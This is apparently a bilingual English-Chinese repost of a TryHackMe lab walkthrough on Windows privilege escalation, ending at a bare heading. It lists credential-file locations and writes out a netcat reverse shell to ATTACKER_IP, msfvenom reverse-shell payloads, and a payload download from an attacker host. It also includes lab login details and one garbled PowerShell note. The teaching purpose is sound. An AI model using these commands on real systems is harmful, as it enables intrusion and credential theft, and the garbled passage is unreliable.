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Tryhackme轮椅式学习 之红队路线 之Windows权限提升

时间:2024-11-23 18:29:24浏览次数:8  
标签:exe service Windows 红队 will user 权限 Tryhackme

Task 1 Introduction 介绍

During a penetration test, you will often have access to some Windows hosts with an unprivileged user. Unprivileged users will hold limited access, including their files and folders only, and have no means to perform administrative tasks on the host, preventing you from having complete control over your target.在渗透测试期间,您通常可以使用非特权用户访问某些 Windows 主机。非特权用户将拥有有限的访问权限,仅包括其文件和文件夹,并且无法在主机上执行管理任务,从而阻止您完全控制目标。

This room covers fundamental techniques that attackers can use to elevate privileges in a Windows environment, allowing you to use any initial unprivileged foothold on a host to escalate to an administrator account, where possible.本房间涵盖了攻击者可以用来在 Windows 环境中提升权限的基本技术,允许您在可能的情况下使用主机上的任何初始非特权立足点升级到管理员帐户。

If you want to brush up on your skills first, you can have a look through the Windows Fundamentals Module or the Hacking Windows Module.如果您想先温习一下自己的技能,可以查看Windows 基础知识模块Hacking Windows 模块

Task 2 Windows Privilege Escalation Windows 权限提升

Simply put, privilege escalation consists of using given access to a host with “user A” and leveraging it to gain access to “user B” by abusing a weakness in the target system. While we will usually want “user B” to have administrative rights, there might be situations where we’ll need to escalate into other unprivileged accounts before actually getting administrative privileges.简而言之,权限升级包括使用“用户 A”对主机的给定访问权限,并通过滥用目标系统中的弱点来利用它来获得对“用户 B”的访问权限。虽然我们通常希望“用户 B”拥有管理权限,但在某些情况下,我们可能需要升级到其他非特权帐户,然后才能真正获得管理权限。

Gaining access to different accounts can be as simple as finding credentials in text files or spreadsheets left unsecured by some careless user, but that won’t always be the case. Depending on the situation, we might need to abuse some of the following weaknesses:获得对不同帐户的访问权限就像在一些粗心的用户留下的不安全的文本文件或电子表格中查找凭据一样简单,但情况并非总是如此。根据具体情况,我们可能需要利用以下一些弱点:

  • Misconfigurations on Windows services or scheduled tasks
    Windows 服务或计划任务配置错误

  • Excessive privileges assigned to our account

  • Vulnerable software

  • Missing Windows security patches
    缺少 Windows 安全补丁

Before jumping into the actual techniques, let’s look at the different account types on a Windows system.在开始讨论实际技术之前,让我们先了解一下 Windows 系统上的不同帐户类型。

Windows Users Windows 用户

Windows systems mainly have two kinds of users. Depending on their access levels, we can categorise a user in one of the following groups:Windows系统主要有两类用户。根据用户的访问级别,我们可以将用户分为以下组之一:

Administrators 管理员These users have the most privileges. They can change any system configuration parameter and access any file in the system.这些用户拥有最多的权限。他们可以更改任何系统配置参数并访问系统中的任何文件。
Standard Users 标准用户These users can access the computer but only perform limited tasks. Typically these users can not make permanent or essential changes to the system and are limited to their files.这些用户可以访问计算机,但只能执行有限的任务。通常,这些用户无法对系统进行永久或重要的更改,并且仅限于他们的文件。

Any user with administrative privileges will be part of the Administrators group. On the other hand, standard users are part of the Users group.任何具有管理权限的用户都将成为管理员组的一部分。另一方面,标准用户是用户组的一部分。

In addition to that, you will usually hear about some special built-in accounts used by the operating system in the context of privilege escalation:除此之外,您通常会听说操作系统在权限升级的情况下使用一些特殊的内置帐户:

SYSTEM / LocalSystem 系统/本地系统An account used by the operating system to perform internal tasks. It has full access to all files and resources available on the host with even higher privileges than administrators.操作系统用来执行内部任务的帐户。它可以完全访问主机上可用的所有文件和资源,并且具有比管理员更高的权限。
Local Service 本地服务Default account used to run Windows services with “minimum” privileges. It will use anonymous connections over the network.用于以“最低”权限运行 Windows 服务的默认帐户。它将使用网络上的匿名连接。
Network Service 网络服务Default account used to run Windows services with “minimum” privileges. It will use the computer credentials to authenticate through the network.用于以“最低”权限运行 Windows 服务的默认帐户。它将使用计算机凭据通过网络进行身份验证。

These accounts are created and managed by Windows, and you won’t be able to use them as other regular accounts. Still, in some situations, you may gain their privileges due to exploiting specific services.这些帐户由 Windows 创建和管理,您将无法像其他常规帐户一样使用它们。不过,在某些情况下,您可能会因为利用特定服务而获得他们的特权。

Task 3 Harvesting Passwords from Usual Spots 从常见地点收集密码

The easiest way to gain access to another user is to gather credentials from a compromised machine. Such credentials could exist for many reasons, including a careless user leaving them around in plaintext files; or even stored by some software like browsers or email clients.获得其他用户访问权限的最简单方法是从受感染的计算机收集凭据。此类凭证的存在可能有多种原因,包括粗心的用户将其留在明文文件中;甚至由某些软件(如浏览器或电子邮件客户端)存储。

This task will present some known places to look for passwords on a Windows system.此任务将介绍一些在 Windows 系统上查找密码的已知位置。

Before going into the task, remember to click the Start Machine button. You will be using the same machine throughout tasks 3 to 5. If you are using the AttackBox, this is also a good moment to start it as you’ll be needing it for the following tasks.在开始任务之前,请记住单击**“启动计算机”按钮。您将在任务 3 到 5 中使用同一台机器。如果您使用AttackBox** ,这也是启动它的好时机,因为您将需要它来执行以下任务。

In case you prefer connecting to the target machine via RDP, you can use the following credentials:如果您更喜欢通过RDP连接到目标计算机,您可以使用以下凭据:

User: thm-unpriv****用户: thm-unpriv

Password: Password321****密码: Password321

Unattended Windows Installations无人值守的 Windows 安装

When installing Windows on a large number of hosts, administrators may use Windows Deployment Services, which allows for a single operating system image to be deployed to several hosts through the network. These kinds of installations are referred to as unattended installations as they don’t require user interaction. Such installations require the use of an administrator account to perform the initial setup, which might end up being stored in the machine in the following locations:在大量主机上安装 Windows 时,管理员可以使用 Windows 部署服务,该服务允许通过网络将单个操作系统映像部署到多台主机。此类安装称为无人值守安装,因为它们不需要用户交互。此类安装需要使用管理员帐户来执行初始设置,该设置最终可能存储在计算机中的以下位置:

  • C:\Unattend.xml

  • C:\Windows\Panther\Unattend.xml

  • C:\Windows\Panther\Unattend\Unattend.xml

  • C:\Windows\system32\sysprep.inf

  • C:\Windows\system32\sysprep\sysprep.xml

As part of these files, you might encounter credentials:作为这些文件的一部分,您可能会遇到凭据:


Powershell History Powershell 历史

Whenever a user runs a command using Powershell, it gets stored into a file that keeps a memory of past commands. This is useful for repeating commands you have used before quickly. If a user runs a command that includes a password directly as part of the Powershell command line, it can later be retrieved by using the following command from a cmd.exe prompt:每当用户使用 Powershell 运行命令时,它都会存储到一个文件中,该文件会保留过去的命令。这对于快速重复之前使用过的命令很有用。如果用户直接在 Powershell 命令行中运行包含密码的命令,则稍后可以在cmd.exe提示符下使用以下命令来检索该密码:

type %userprofile%\AppData\Roaming\Microsoft\Windows\PowerShell\PSReadline\ConsoleHost_history.txt

Note: The command above will only work from cmd.exe, as Powershell won’t recognize %userprofile% as an environment variable. To read the file from Powershell, you’d have to replace %userprofile% with  E n v : u s e r p r o f i l e ∗ ∗ .   ∗ ∗ 注意: ∗ ∗ 上面的命令只能在 c m d . e x e 中运行,因为 P o w e r s h e l l 不会将 ∗ ∗ Env:userprofile**. **注意:**上面的命令只能在 cmd.exe 中运行,因为 Powershell 不会将**%userprofile%**识别为环境变量。要从 Powershell 读取该文件,您必须将**%userprofile%**替换为** Env:userprofile∗∗. ∗∗注意:∗∗上面的命令只能在cmd.exe中运行,因为Powershell不会将∗∗Env:userprofile 。

Saved Windows Credentials保存的 Windows 凭据

Windows allows us to use other users’ credentials. This function also gives the option to save these credentials on the system. The command below will list saved credentials:Windows 允许我们使用其他用户的凭据。此功能还提供了将这些凭据保存在系统上的选项。下面的命令将列出保存的凭据:

cmdkey /list

While you can’t see the actual passwords, if you notice any credentials worth trying, you can use them with the runas command and the /savecred option, as seen below.虽然您看不到实际的密码,但如果您发现任何值得尝试的凭据,您可以将它们与runas命令和**/savecred**选项一起使用,如下所示。

runas /savecred /user:admin cmd.exe

IIS Configuration IIS 配置

Internet Information Services (IIS) is the default web server on Windows installations. The configuration of websites on IIS is stored in a file called web.config and can store passwords for databases or configured authentication mechanisms. Depending on the installed version of IIS, we can find web.config in one of the following locations:Internet 信息服务 (IIS) 是 Windows 安装上的默认 Web 服务器。 IIS 上网站的配置存储在名为web.config的文件中,并且可以存储数据库的密码或配置的身份验证机制。根据安装的 IIS 版本,我们可以在以下位置之一找到 web.config:

  • C:\inetpub\wwwroot\web.config

  • C:\Windows\Microsoft.NET\Framework64\v4.0.30319\Config\web.config

Here is a quick way to find database connection strings on the file:这是在文件上查找数据库连接字符串的快速方法:

type C:\Windows\Microsoft.NET\Framework64\v4.0.30319\Config\web.config | findstr connectionString

Retrieve Credentials from Software: PuTTY从软件检索凭证:PuTTY

PuTTY is an SSH client commonly found on Windows systems. Instead of having to specify a connection’s parameters every single time, users can store sessions where the IP, user and other configurations can be stored for later use. While PuTTY won’t allow users to store their SSH password, it will store proxy configurations that include cleartext authentication credentials.PuTTY 是 Windows 系统上常见的 SSH 客户端。用户不必每次都指定连接参数,而是可以存储会话,其中可以存储 IP、用户和其他配置以供以后使用。虽然 PuTTY 不允许用户存储其SSH密码,但它将存储包含明文身份验证凭据的代理配置。

To retrieve the stored proxy credentials, you can search under the following registry key for ProxyPassword with the following command:要检索存储的代理凭据,您可以使用以下命令在以下注册表项下搜索 ProxyPassword:

reg query HKEY_CURRENT_USER\Software\SimonTatham\PuTTY\Sessions\ /f "Proxy" /s

Note: Simon Tatham is the creator of PuTTY (and his name is part of the path), not the username for which we are retrieving the password. The stored proxy username should also be visible after running the command above.注意: Simon Tatham 是 PuTTY 的创建者(他的名字是路径的一部分),而不是我们要检索密码的用户名。运行上述命令后,存储的代理用户名也应该可见。

Just as putty stores credentials, any software that stores passwords, including browsers, email clients, FTP clients, SSH clients, VNC software and others, will have methods to recover any passwords the user has saved.正如 putty 存储凭据一样,任何存储密码的软件,包括浏览器、电子邮件客户端、FTP 客户端、 SSH客户端、VNC 软件等,都将有方法恢复用户保存的任何密码。

Task 4 Other Quick Wins 其他快速获胜

Privilege escalation is not always a challenge. Some misconfigurations can allow you to obtain higher privileged user access and, in some cases, even administrator access. It would help if you considered these to belong more to the realm of CTF events rather than scenarios you will encounter during real penetration testing engagements. However, if none of the previously mentioned methods works, you can always go back to these.权限升级并不总是一个挑战。某些错误配置可能会让您获得更高特权的用户访问权限,在某些情况下甚至可以获得管理员访问权限。如果您认为这些更多地属于 CTF 事件领域,而不是您在实际渗透测试过程中遇到的场景,这将会有所帮助。但是,如果前面提到的方法都不起作用,您可以随时返回这些方法。

Scheduled Tasks 计划任务

Looking into scheduled tasks on the target system, you may see a scheduled task that either lost its binary or it’s using a binary you can modify.查看目标系统上的计划任务,您可能会看到计划任务丢失了其二进制文件或正在使用您可以修改的二进制文件。

Scheduled tasks can be listed from the command line using the schtasks command without any options. To retrieve detailed information about any of the services, you can use a command like the following one:可以使用不带任何选项的schtasks命令从命令行列出计划任务。要检索有关任何服务的详细信息,您可以使用如下命令:

Command Prompt 命令提示符

C:\> schtasks /query /tn vulntask /fo list /v
Folder: \
HostName:                             THM-PC1
TaskName:                             \vulntask
Task To Run:                          C:\tasks\schtask.bat
Run As User:                          taskusr1

You will get lots of information about the task, but what matters for us is the “Task to Run” parameter which indicates what gets executed by the scheduled task, and the “Run As User” parameter, which shows the user that will be used to execute the task.您将获得有关该任务的大量信息,但对我们来说重要的是“要运行的任务”参数,该参数指示计划任务执行的内容,以及“以用户身份运行”参数,该参数显示将使用的用户执行任务。

If our current user can modify or overwrite the “Task to Run” executable, we can control what gets executed by the taskusr1 user, resulting in a simple privilege escalation. To check the file permissions on the executable, we use icacls:如果我们当前的用户可以修改或覆盖“要运行的任务”可执行文件,我们就可以控制 taskusr1 用户执行的内容,从而实现简单的权限提升。要检查可执行文件的文件权限,我们使用icacls :

Command Prompt 命令提示符

C:\> icacls c:\tasks\schtask.bat
c:\tasks\schtask.bat NT AUTHORITY\SYSTEM:(I)(F)

As can be seen in the result, the BUILTIN\Users group has full access (F) over the task’s binary. This means we can modify the .bat file and insert any payload we like. For your convenience, nc64.exe can be found on C:\tools. Let’s change the bat file to spawn a reverse shell:从结果中可以看出, BUILTIN\Users组对任务的二进制文件具有完全访问权限 (F)。这意味着我们可以修改 .bat 文件并插入我们喜欢的任何有效负载。为了您的方便, nc64.exe可以在C:\tools中找到。让我们更改 bat 文件以生成反向 shell:

Command Prompt 命令提示符

C:\> echo c:\tools\nc64.exe -e cmd.exe ATTACKER_IP 4444 > C:\tasks\schtask.bat

We then start a listener on the attacker machine on the same port we indicated on our reverse shell:然后,我们在攻击者机器上启动一个侦听器,该侦听器位于我们在反向 shell 上指示的同一端口上:

nc -lvp 4444

The next time the scheduled task runs, you should receive the reverse shell with taskusr1 privileges. While you probably wouldn’t be able to start the task in a real scenario and would have to wait for the scheduled task to trigger, we have provided your user with permissions to start the task manually to save you some time. We can run the task with the following command:下次运行计划任务时,您应该会收到具有taskusr1权限的反向shell。虽然您可能无法在实际场景中启动任务,而必须等待计划任务触发,但我们为您的用户提供了手动启动任务的权限,以节省您的时间。我们可以使用以下命令运行该任务:

Command Prompt 命令提示符

C:\> schtasks /run /tn vulntask

And you will receive the reverse shell with taskusr1 privileges as expected:您将按预期收到具有taskusr1权限的反向shell:

Kali 卡利语Linux

user@attackerpc$ nc -lvp 4444Listening on 4444
Connection received on 50649
Microsoft Windows [Version 10.0.17763.1821]
(c) 2018 Microsoft Corporation. All rights reserved.


Go to taskusr1 desktop to retrieve a flag. Don’t forget to input the flag at the end of this task.转到taskusr1 桌面以检索标志。不要忘记在此任务结束时输入标志。

AlwaysInstallElevated 始终安装提升

Windows installer files (also known as .msi files) are used to install applications on the system. They usually run with the privilege level of the user that starts it. However, these can be configured to run with higher privileges from any user account (even unprivileged ones). This could potentially allow us to generate a malicious MSI file that would run with admin privileges.Windows 安装程序文件(也称为 .msi 文件)用于在系统上安装应用程序。它们通常以启动它的用户的权限级别运行。但是,可以将它们配置为从任何用户帐户(甚至是非特权帐户)以更高的权限运行。这可能会让我们生成一个以管理员权限运行的恶意 MSI 文件。

Note: The AlwaysInstallElevated method won’t work on this room’s machine and it’s included as information only.注意: AlwaysInstallElevated 方法在此房间的计算机上不起作用,它仅供参考。

This method requires two registry values to be set. You can query these from the command line using the commands below.此方法需要设置两个注册表值。您可以使用以下命令从命令行查询这些内容。

Command Prompt 命令提示符

C:\> reg query HKCU\SOFTWARE\Policies\Microsoft\Windows\Installer
C:\> reg query HKLM\SOFTWARE\Policies\Microsoft\Windows\Installer

To be able to exploit this vulnerability, both should be set. Otherwise, exploitation will not be possible. If these are set, you can generate a malicious .msi file using msfvenom, as seen below:为了能够利用此漏洞,两者都应该设置。否则,利用将是不可能的。如果设置了这些,您可以使用msfvenom生成恶意 .msi 文件,如下所示:

msfvenom -p windows/x64/shell_reverse_tcp LHOST=ATTACKING_MACHINE_IP LPORT=LOCAL_PORT -f msi -o malicious.msi

As this is a reverse shell, you should also run the Metasploit Handler module configured accordingly. Once you have transferred the file you have created, you can run the installer with the command below and receive the reverse shell:由于这是一个反向 shell,您还应该运行相应配置的Metasploit处理程序模块。传输创建的文件后,您可以使用以下命令运行安装程序并接收反向 shell:

Command Prompt 命令提示符

C:\> msiexec /quiet /qn /i C:\Windows\Temp\malicious.msi

Task 5 Abusing Service Misconfigurations 滥用服务错误配置

Windows Services 视窗服务

Windows services are managed by the Service Control Manager (SCM). The SCM is a process in charge of managing the state of services as needed, checking the current status of any given service and generally providing a way to configure services.Windows 服务由服务控制管理器(SCM) 管理。 SCM 是一个负责根据需要管理服务状态、检查任何给定服务的当前状态并通常提供配置服务的方法的进程。

Each service on a Windows machine will have an associated executable which will be run by the SCM whenever a service is started. It is important to note that service executables implement special functions to be able to communicate with the SCM, and therefore not any executable can be started as a service successfully. Each service also specifies the user account under which the service will run.Windows 计算机上的每个服务都有一个关联的可执行文件,每当服务启动时,SCM 都会运行该可执行文件。需要注意的是,服务可执行文件实现特殊功能以便能够与 SCM 通信,因此任何可执行文件都不能作为服务成功启动。每个服务还指定该服务将在其下运行的用户帐户。

To better understand the structure of a service, let’s check the apphostsvc service configuration with the sc qc command:为了更好地理解服务的结构,让我们使用sc qc命令检查 apphostsvc 服务配置:

Command Prompt 命令提示符

C:\> sc qc apphostsvc
[SC] QueryServiceConfig SUCCESS

SERVICE_NAME: apphostsvc
        TYPE               : 20  WIN32_SHARE_PROCESS
        START_TYPE         : 2   AUTO_START
        ERROR_CONTROL      : 1   NORMAL
        BINARY_PATH_NAME   : C:\Windows\system32\svchost.exe -k apphost
        LOAD_ORDER_GROUP   :
        TAG                : 0
        DISPLAY_NAME       : Application Host Helper Service
        DEPENDENCIES       :
        SERVICE_START_NAME : localSystem

Here we can see that the associated executable is specified through the BINARY_PATH_NAME parameter, and the account used to run the service is shown on the SERVICE_START_NAME parameter.在这里我们可以看到关联的可执行文件是通过BINARY_PATH_NAME参数指定的,用于运行服务的帐户显示在SERVICE_START_NAME参数上。

Services have a Discretionary Access Control List (DACL), which indicates who has permission to start, stop, pause, query status, query configuration, or reconfigure the service, amongst other privileges. The DACL can be seen from Process Hacker (available on your machine’s desktop):服务具有自主访问控制列表 (DACL),它指示谁有权启动、停止、暂停、查询状态、查询配置或重新配置服务以及其他权限。 DACL 可以从 Process Hacker 中看到(可以在您的计算机桌面上找到):

All of the services configurations are stored on the registry under **HKLM\SYSTEM\CurrentControlSet\Services**:所有服务配置都存储在注册表中 *HKLM\SYSTEM\CurrentControlSet\Services* :

A subkey exists for every service in the system. Again, we can see the associated executable on the ImagePath value and the account used to start the service on the ObjectName value. If a DACL has been configured for the service, it will be stored in a subkey called Security. As you have guessed by now, only administrators can modify such registry entries by default.系统中的每个服务都存在一个子项。同样,我们可以在ImagePath值上看到关联的可执行文件,并在ObjectName值上看到用于启动服务的帐户。如果已为服务配置了DACL ,它将存储在名为Security 的子项中。正如您现在已经猜到的,默认情况下只有管理员可以修改此类注册表项。

Insecure Permissions on Service Executable服务可执行文件的不安全权限

If the executable associated with a service has weak permissions that allow an attacker to modify or replace it, the attacker can gain the privileges of the service’s account trivially.如果与服务关联的可执行文件的权限较弱,允许攻击者修改或替换它,则攻击者可以轻松获得该服务帐户的权限。

To understand how this works, let’s look at a vulnerability found on Splinterware System Scheduler. To start, we will query the service configuration using sc:为了了解其工作原理,让我们看一下 Splinterware System Scheduler 上发现的漏洞。首先,我们将使用sc查询服务配置:

Command Prompt 命令提示符

C:\> sc qc WindowsScheduler
[SC] QueryServiceConfig SUCCESS

SERVICE_NAME: windowsscheduler
        TYPE               : 10  WIN32_OWN_PROCESS
        START_TYPE         : 2   AUTO_START
        ERROR_CONTROL      : 0   IGNORE
        BINARY_PATH_NAME   : C:\PROGRA~2\SYSTEM~1\WService.exe
        LOAD_ORDER_GROUP   :
        TAG                : 0
        DISPLAY_NAME       : System Scheduler Service
        DEPENDENCIES       :
        SERVICE_START_NAME : .\svcuser1

We can see that the service installed by the vulnerable software runs as svcuser1 and the executable associated with the service is in C:\Progra2\System1\WService.exe. We then proceed to check the permissions on the executable:我们可以看到漏洞软件安装的服务以 svcuser1 身份运行,并且与该服务关联的可执行文件位于 C:\Progra2\System1\WService.exe 。然后我们继续检查可执行文件的权限:

Command Prompt 命令提示符

C:\Users\thm-unpriv>icacls C:\PROGRA~2\SYSTEM~1\WService.exe
C:\PROGRA~2\SYSTEM~1\WService.exe Everyone:(I)(M)
                                  NT AUTHORITY\SYSTEM:(I)(F)

Successfully processed 1 files; Failed processing 0 files

And here we have something interesting. The Everyone group has modify permissions (M) on the service’s executable. This means we can simply overwrite it with any payload of our preference, and the service will execute it with the privileges of the configured user account.这里有一些有趣的事情。 Everyone 组对服务的可执行文件具有修改权限 (M)。这意味着我们可以简单地用我们偏好的任何有效负载覆盖它,并且该服务将使用配置的用户帐户的权限执行它。

Let’s generate an exe-service payload using msfvenom and serve it through a python webserver:让我们使用 msfvenom 生成一个 exe-service 负载并通过 python Web 服务器提供它:

Kali 卡利语Linux

user@attackerpc$ msfvenom -p windows/x64/shell_reverse_tcp LHOST=ATTACKER_IP LPORT=4445 -f exe-service -o rev-svc.exeuser@attackerpc$ python3 -m http.serverServing HTTP on port 8000 ( ...

We can then pull the payload from Powershell with the following command:然后我们可以使用以下命令从 Powershell 中提取有效负载:

Powershell 电源外壳

wget http://ATTACKER_IP:8000/rev-svc.exe -O rev-svc.exe

Once the payload is in the Windows server, we proceed to replace the service executable with our payload. Since we need another user to execute our payload, we’ll want to grant full permissions to the Everyone group as well:一旦有效负载位于 Windows 服务器中,我们就继续用有效负载替换服务可执行文件。由于我们需要另一个用户来执行我们的有效负载,因此我们还希望向Everyone组授予完全权限:

Command Prompt 命令提示符

C:\> cd C:\PROGRA~2\SYSTEM~1\

C:\PROGRA~2\SYSTEM~1> move WService.exe WService.exe.bkp
        1 file(s) moved.

C:\PROGRA~2\SYSTEM~1> move C:\Users\thm-unpriv\rev-svc.exe WService.exe
        1 file(s) moved.

C:\PROGRA~2\SYSTEM~1> icacls WService.exe /grant Everyone:F
        Successfully processed 1 files.

We start a reverse listener on our attacker machine:我们在攻击者机器上启动一个反向侦听器:

Kali 卡利语Linux

user@attackerpc$ nc -lvp 4445

And finally, restart the service. While in a normal scenario, you would likely have to wait for a service restart, you have been assigned privileges to restart the service yourself to save you some time. Use the following commands from a cmd.exe command prompt:最后,重新启动服务。虽然在正常情况下,您可能需要等待服务重新启动,但您已被分配了自行重新启动服务的权限,以节省一些时间。从 cmd.exe 命令提示符使用以下命令:

Command Prompt 命令提示符

C:\> sc stop windowsscheduler
C:\> sc start windowsscheduler

Note: PowerShell has sc as an alias to Set-Content, therefore you need to use sc.exe in order to control services with PowerShell this way.注意: PowerShell将sc作为Set-Content别名,因此您需要使用sc.exe才能以这种方式使用PowerShell控制服务。

As a result, you’ll get a reverse shell with svcusr1 privileges:结果,您将获得具有 svcusr1 权限的反向 shell:

Kali 卡利语Linux

user@attackerpc$ nc -lvp 4445Listening on 4445
Connection received on 50649
Microsoft Windows [Version 10.0.17763.1821]
(c) 2018 Microsoft Corporation. All rights reserved.


Go to svcusr1 desktop to retrieve a flag. Don’t forget to input the flag at the end of this task.转到 svcusr1 桌面以检索标志。不要忘记在此任务结束时输入标志。

Unquoted Service Paths 未加引号的服务路径

When we can’t directly write into service executables as before, there might still be a chance to force a service into running arbitrary executables by using a rather obscure feature.当我们无法像以前一样直接写入服务可执行文件时,仍然有机会通过使用相当模糊的功能来强制服务运行任意可执行文件。

When working with Windows services, a very particular behaviour occurs when the service is configured to point to an “unquoted” executable. By unquoted, we mean that the path of the associated executable isn’t properly quoted to account for spaces on the command.使用 Windows 服务时,当服务配置为指向“未加引号”的可执行文件时,会出现非常特殊的行为。不加引号是指未正确引用关联可执行文件的路径以解决命令中的空格问题。

As an example, let’s look at the difference between two services (these services are used as examples only and might not be available in your machine). The first service will use a proper quotation so that the SCM knows without a doubt that it has to execute the binary file pointed by “C:\Program Files\RealVNC\VNC Server\vncserver.exe”, followed by the given parameters:作为示例,让我们看一下两个服务之间的区别(这些服务仅用作示例,可能在您的计算机中不可用)。第一个服务将使用正确的引用,以便 SCM 毫无疑问地知道它必须执行由 “C:\Program Files\RealVNC\VNC Server\vncserver.exe” ,后跟给定的参数:

Command Prompt 命令提示符

C:\> sc qc "vncserver"
[SC] QueryServiceConfig SUCCESS

SERVICE_NAME: vncserver
        TYPE               : 10  WIN32_OWN_PROCESS
        START_TYPE         : 2   AUTO_START
        ERROR_CONTROL      : 0   IGNORE
        BINARY_PATH_NAME   : "C:\Program Files\RealVNC\VNC Server\vncserver.exe" -service
        LOAD_ORDER_GROUP   :
        TAG                : 0
        DISPLAY_NAME       : VNC Server
        DEPENDENCIES       :
        SERVICE_START_NAME : LocalSystem

**Remember: PowerShell has ‘sc’ as an alias to ‘Set-Content’, therefore you need to use ‘sc.exe’ to control services if you are in a PowerShell prompt.请记住:PowerShell 将“sc”作为“Set-Content”的别名,因此,如果您处于PowerShell提示符中,则需要使用“sc.exe”来控制服务。**Now let’s look at another service without proper quotation:现在让我们看看另一项没有正确报价的服务:

Command Prompt 命令提示符

C:\> sc qc "disk sorter enterprise"
[SC] QueryServiceConfig SUCCESS

SERVICE_NAME: disk sorter enterprise
        TYPE               : 10  WIN32_OWN_PROCESS
        START_TYPE         : 2   AUTO_START
        ERROR_CONTROL      : 0   IGNORE
        BINARY_PATH_NAME   : C:\MyPrograms\Disk Sorter Enterprise\bin\disksrs.exe
        LOAD_ORDER_GROUP   :
        TAG                : 0
        DISPLAY_NAME       : Disk Sorter Enterprise
        DEPENDENCIES       :
        SERVICE_START_NAME : .\svcusr2

When the SCM tries to execute the associated binary, a problem arises. Since there are spaces on the name of the “Disk Sorter Enterprise” folder, the command becomes ambiguous, and the SCM doesn’t know which of the following you are trying to execute:当 SCM 尝试执行关联的二进制文件时,就会出现问题。由于“Disk Sorter Enterprise”文件夹的名称上有空格,因此该命令变得不明确,并且 SCM 不知道您正在尝试执行以下哪一个:

Command 命令Argument 1 论据1Argument 2 论据2
C:\MyPrograms\Disk.exeSorter 分拣机Enterprise\bin\disksrs.exe企业\bin\disksrs.exe
C:\MyPrograms\Disk Sorter.exeC:\MyPrograms\磁盘排序器.exeEnterprise\bin\disksrs.exe企业\bin\disksrs.exe
C:\MyPrograms\Disk Sorter Enterprise\bin\disksrs.exe

This has to do with how the command prompt parses a command. Usually, when you send a command, spaces are used as argument separators unless they are part of a quoted string. This means the “right” interpretation of the unquoted command would be to execute C:\MyPrograms\Disk.exe and take the rest as arguments.这与命令提示符如何解析命令有关。通常,当您发送命令时,空格将用作参数分隔符,除非它们是带引号的字符串的一部分。这意味着未加引号的命令的“正确”解释是执行C:\MyPrograms\Disk.exe并将其余部分作为参数。

Instead of failing as it probably should, SCM tries to help the user and starts searching for each of the binaries in the order shown in the table:SCM 没有像它可能应该发生的那样失败,而是尝试帮助用户并开始按照表中所示的顺序搜索每个二进制文件:

  1. First, search for C:\MyPrograms\Disk.exe. If it exists, the service will run this executable.
    首先,搜索C:\MyPrograms\Disk.exe 。如果存在,该服务将运行此可执行文件。

  2. If the latter doesn’t exist, it will then search for C:\MyPrograms\Disk Sorter.exe. If it exists, the service will run this executable.
    如果后者不存在,则会搜索 C:\MyPrograms\Disk Sorter.exe 。如果存在,该服务将运行此可执行文件。

  3. If the latter doesn’t exist, it will then search for C:\MyPrograms\Disk Sorter Enterprise\bin\disksrs.exe. This option is expected to succeed and will typically be run in a default installation.
    如果后者不存在,则会搜索 C:\MyPrograms\Disk Sorter Enterprise\bin\disksrs.exe 。此选项预计会成功,并且通常会在默认安装中运行。

From this behaviour, the problem becomes evident. If an attacker creates any of the executables that are searched for before the expected service executable, they can force the service to run an arbitrary executable.从这个行为来看,问题就显而易见了。如果攻击者创建了在预期服务可执行文件之前搜索的任何可执行文件,他们就可以强制服务运行任意可执行文件。

While this sounds trivial, most of the service executables will be installed under C:\Program Files or C:\Program Files (x86) by default, which isn’t writable by unprivileged users. This prevents any vulnerable service from being exploited. There are exceptions to this rule: - Some installers change the permissions on the installed folders, making the services vulnerable. - An administrator might decide to install the service binaries in a non-default path. If such a path is world-writable, the vulnerability can be exploited.虽然这听起来微不足道,但默认情况下,大多数服务可执行文件将安装在C:\Program Files或**C:\Program Files (x86)**下,非特权用户无法写入。这可以防止任何易受攻击的服务被利用。此规则也有例外: - 某些安装程序更改已安装文件夹的权限,使服务容易受到攻击。 - 管理员可能决定将服务二进制文件安装在非默认路径中。如果这样的路径是全局可写的,则该漏洞可以被利用。

In our case, the Administrator installed the Disk Sorter binaries under c:\MyPrograms. By default, this inherits the permissions of the C:* directory, which allows any user to create files and folders in it. We can check this using icacls:在我们的例子中,管理员将磁盘排序器二进制文件安装在c:\MyPrograms下。默认情况下,它继承C:**目录的权限,允许任何用户在其中创建文件和文件夹。我们可以使用icacls*检查这一点:

Command Prompt 命令提示符

C:\>icacls c:\MyPrograms
              CREATOR OWNER:(I)(OI)(CI)(IO)(F)

Successfully processed 1 files; Failed processing 0 files

The BUILTIN\Users group has AD and WD privileges, allowing the user to create subdirectories and files, respectively.BUILTIN\Users组具有ADWD权限,允许用户分别创建子目录和文件。

The process of creating an exe-service payload with msfvenom and transferring it to the target host is the same as before, so feel free to create the following payload and upload it to the server as before. We will also start a listener to receive the reverse shell when it gets executed:使用 msfvenom 创建 exe-service Payload 并将其传输到目标主机的过程与以前相同,因此请像以前一样创建以下 Payload 并将其上传到服务器。我们还将启动一个侦听器来接收反向 shell 执行时的情况:

Kali 卡利语Linux

user@attackerpc$ msfvenom -p windows/x64/shell_reverse_tcp LHOST=ATTACKER_IP LPORT=4446 -f exe-service -o rev-svc2.exeuser@attackerpc$ nc -lvp 4446

Once the payload is in the server, move it to any of the locations where hijacking might occur. In this case, we will be moving our payload to C:\MyPrograms\Disk.exe. We will also grant Everyone full permissions on the file to make sure it can be executed by the service:一旦有效负载进入服务器,请将其移动到可能发生劫持的任何位置。在这种情况下,我们将把有效负载移动到C:\MyPrograms\Disk.exe 。我们还将授予每个人对该文件的完全权限,以确保该服务可以执行该文件:

Command Prompt 命令提示符

C:\> move C:\Users\thm-unpriv\rev-svc2.exe C:\MyPrograms\Disk.exe

C:\> icacls C:\MyPrograms\Disk.exe /grant Everyone:F
        Successfully processed 1 files.

Once the service gets restarted, your payload should execute:服务重新启动后,您的有效负载应该执行:

Command Prompt 命令提示符

C:\> sc stop "disk sorter enterprise"
C:\> sc start "disk sorter enterprise"

As a result, you’ll get a reverse shell with svcusr2 privileges:结果,您将获得具有 svcusr2 权限的反向 shell:

Kali 卡利语Linux

user@attackerpc$ nc -lvp 4446Listening on 4446
Connection received on 50650
Microsoft Windows [Version 10.0.17763.1821]
(c) 2018 Microsoft Corporation. All rights reserved.


Go to svcusr2 desktop to retrieve a flag. Don’t forget to input the flag at the end of this task.转到 svcusr2 桌面以检索标志。不要忘记在此任务结束时输入标志。

Insecure Service Permissions不安全的服务权限

